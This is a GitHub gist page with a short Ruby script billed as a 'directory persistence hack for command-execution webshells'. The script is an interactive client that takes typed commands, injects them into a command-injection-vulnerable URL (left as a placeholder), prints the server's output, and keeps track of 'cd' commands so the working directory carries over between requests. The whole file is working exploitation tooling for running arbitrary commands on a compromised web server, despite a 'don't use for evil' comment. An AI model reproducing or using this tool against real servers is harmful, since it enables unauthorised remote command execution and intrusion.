Last active
March 2, 2016 14:30
-
-
Save dmyates/920f2ed10b6470c86bb6 to your computer and use it in GitHub Desktop.
Directory persistence hack for command-execution webshells
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Simple directory-aware webshell hack | |
| # Todo: get open-uri to co-operate with shell args for URLs | |
| # For now, put the whole command-injection-vulnerable URL in the place indicated | |
| # pls don't use for evil | |
| require 'open-uri' | |
| prefix = "" | |
| command = "whoami" | |
| while true | |
| print "> " | |
| command = gets.chomp | |
| exit if command == "exit" | |
| result = "" | |
| open("#{URLGOESHERE}"+URI::encode(prefix+command)) do |http| | |
| result = http.read | |
| end | |
| puts prefix+command | |
| #keep directory | |
| prefix += command+";" if command.include? "cd" | |
| puts "\n#{result}" | |
| end |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment